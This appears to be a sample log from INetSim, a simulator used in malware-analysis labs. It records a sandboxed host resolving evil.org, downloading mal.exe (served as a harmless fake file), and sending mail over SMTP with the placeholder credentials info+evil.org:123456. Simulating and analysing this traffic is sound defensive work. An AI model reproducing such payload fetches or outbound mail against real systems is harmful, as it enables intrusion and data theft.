[2007-10-07 14:24:41] [samplesession] [dns 53/udp/tcp] [172.16.1.5] connect
[2007-10-07 14:24:41] [samplesession] [dns 53/udp/tcp] [172.16.1.5] recv: Query Type A, Class IN, Name evil.org
[2007-10-07 14:24:41] [samplesession] [dns 53/udp/tcp] [172.16.1.5] send: evil.org 3600 IN A 172.16.1.1
[2007-10-07 14:24:41] [samplesession] [dns 53/udp/tcp] [172.16.1.5] disconnect
[2007-10-07 14:24:41] [samplesession] [dns 53/udp/tcp] [172.16.1.5] stat: 1 qtype=A qclass=IN qname=evil.org
[2007-10-07 14:24:41] [samplesession] [http 80/tcp] [172.16.1.5:1031] connect
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: GET /mal.exe HTTP/1.1
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: Accept: */*
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: UA-CPU: x86
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: Accept-Encoding: gzip, deflate
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: Host: evil.org
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] recv: Connection: Keep-Alive
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] info: Request URL: http://evil.org/mal.exe
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] send: 200 OK
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] send: Server: Microsoft-IIS/4.0
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] send: Connection: Close
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] send: Content-Length: 24576
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] send: Content-Type: x-msdos-program
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] send: Date: Thu, 11 Oct 2007 12:24:44 GMT
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] info: Sending file: /opt/inetsim/data/http/fakefiles/sample_gui.exe
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] stat: 1 method=GET url=http://evil.org/mal.exe file=/opt/inetsim/data/http/fakefiles/sample_gui.exe
[2007-10-07 14:24:44] [samplesession] [http 80/tcp] [172.16.1.5:1031] disconnect
[2007-10-07 14:26:00] [samplesession] [dns 53/udp/tcp] [172.16.1.5] connect
[2007-10-07 14:26:00] [samplesession] [dns 53/udp/tcp] [172.16.1.5] recv: Query Type A, Class IN, Name mail.evil.org
[2007-10-07 14:26:00] [samplesession] [dns 53/udp/tcp] [172.16.1.5] send: mail.evil.org 3600 IN A 172.16.1.1
[2007-10-07 14:26:00] [samplesession] [dns 53/udp/tcp] [172.16.1.5] disconnect
[2007-10-07 14:26:00] [samplesession] [dns 53/udp/tcp] [172.16.1.5] stat: 1 qtype=A qclass=IN qname=mail.evil.org
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] connect
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 220 mail.inetsim.org INetSim SMTP Mailer ready.
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: EHLO 172.16.1.5
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250-mail.inetsim.org
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250-ENHANCEDSTATUSCODES
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250-8BITMIME
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250-SIZE 10240000
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250-AUTH PLAIN LOGIN CRAM-MD5
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250 ETRN
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: AUTH LOGIN
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 334 VXNlcm5hbWU6
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] info: VXNlcm5hbWU6 => Username:
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: aW5mbytldmlsLm9yZwo=
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] info: aW5mbytldmlsLm9yZwo= => info+evil.org
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 334 UGFzc3dvcmQ6
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] info: UGFzc3dvcmQ6 => Password:
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: MTIzNDU2
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] info: MTIzNDU2 => 123456
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 235 Authentication successful
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: MAIL FROM: info@evil.org
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250 Ok
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: RCPT TO: info@evil.org
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250 Ok
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: DATA
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 354 End data with <CR><LF>.<CR><LF>
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: <(MESSAGE)>
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] recv: .
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] send: 250 Ok: queued as 470E1658
[2007-10-07 14:26:00] [samplesession] [smtp 25/tcp] [172.16.1.5:1036] stat: 1 mails=1 recips=1 auth=login creds=info+evil.org:123456